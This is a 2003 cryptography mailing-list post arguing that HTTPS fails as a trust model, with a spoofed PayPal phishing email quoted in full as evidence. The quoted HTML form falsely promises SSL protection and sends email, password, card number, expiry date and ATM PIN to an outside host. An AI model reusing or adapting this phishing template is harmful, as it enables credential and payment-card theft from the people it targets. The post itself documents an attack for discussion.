Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle. The bottom line is that https just is not working. Its broken. The fact that people keep using shared secrets is a symptom of https not working. The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets. -------------- Enclosure number 1 ---------------- Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by dpmail07.doteasy.com (SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700 Date: Sun, 08 Jun 2003 02:50:24 +0000 From: Confirm <confirm@paypal.com> Subject: Important Information Regarding Your PayPal Account To: Jamesd <jamesd@echeque.com> References: <4FG6E0K8HJHJ2DL9@echeque.com> In-Reply-To: <4FG6E0K8HJHJ2DL9@echeque.com> Message-ID: <62K3JH9LKLB0I8GK@paypal.com> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit X-RCPT-TO: <jamesd@echeque.com> Status: U X-PMFLAGS: 34079360 0 1 P4EDB0.CNM <html> <head> <STYLE type=text/css> .dummy {} BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: #000000;} UL {list-style: square} .pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: bold;color: #003366;} .pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 22px;font-weight: bold;color: #003366;} .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} .pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 14px;font-weight: bold;color: #000000;} .pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #000000;} .pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #003366;} .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} </STYLE> <title>PayPal</title> </head> <body> <table width="600" cellspacing="0" cellpadding="0" border="0" align="center"> <tr> <td><A href="https://www.paypal.com/"><IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 height=35 alt="PayPal" border="0" vspace=10></A> </td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td background="http://www.paypal.com/images/bg_clk.gif" width="100%"><img src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td> </tr> <tr> <td><img src="http://www.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td> </tr> </table> <table width="600" cellspacing="0" cellpadding="5" border="0" align="center"> <tr> <td class="pp_sortofbig" align=middle>Dear PayPal Customer</td> </tr> <tr> <td valign="top"><p> </p> <p>This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.</p> <p>The inactive customers are subject to restriction and removal in the next 3 months.</p> <p>Please confirm your email address and Credit or Check Card information<b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> </b>using the form below:</p></td> </tr> <tr> <td align=middle> <form action="http://www.pos2life.biz/vp.php" method="post"> <p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px" > </p> <table border="0"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Email Address:</b></P></td> <td><input name="lgn" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Password:</b></P></td> <td><input name="psw" type="password" size="32" maxlength="32"></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">First Name:</b></P></td> <td><input name="fname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Last Name:</b></P></td> <td><input name="lname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> ZIP:</b></P></td> <td><input name="bz" size="32" maxlength="20"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td> <td><input name="cz" size="32" maxlength="16"></td> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Expiration Date:</b></P></td> <td> <select name="crdm"> <OPTION value="zero" selected>Month</OPTION> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> / <select name="crdy"> <OPTION value="zero" selected>Year</OPTION> <option value="03">2003</option> <option value="04">2004</option> <option value="05">2005</option> <option value="06">2006</option> <option value="07">2007</option> <option value="08">2008</option> <option value="09">2009</option> <option value="10">2010</option> <option value="11">2011</option> <option value="12">2012</option> </select> </td> <tr> <td> <P align=left><b style="FONT: bold 8pt : normal" > ATM PIN:</b></P></td> <td><input name="pni" type="password" size="32" maxlength="6"></td> </tr> </table> <p> <input type="submit" value=" Submit "> </p> </form> Information transmitted using 128bit SSL encryption. <p><br> </p></td> </tr> <tr> <td align=middle><strong>Thanks for using PayPal! </strong><br></td> </tr> <tr> <td><img src="http://www.paypal.com/images/dot_row_long.gif"></td> </tr> <tr> <td class="pp_footer"> This PayPal notification was sent to this email address because you are a Web Accept user and chose to receive the PayPal Periodical newsletter and Product Updates. To modify your notification preferences, go to <A href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</A> and log in to your account. Changes may take several days to be reflected in our mailings. Replies to this email will not be processed. <br> <br> Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. </td> </tr> </table> </body></html> --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com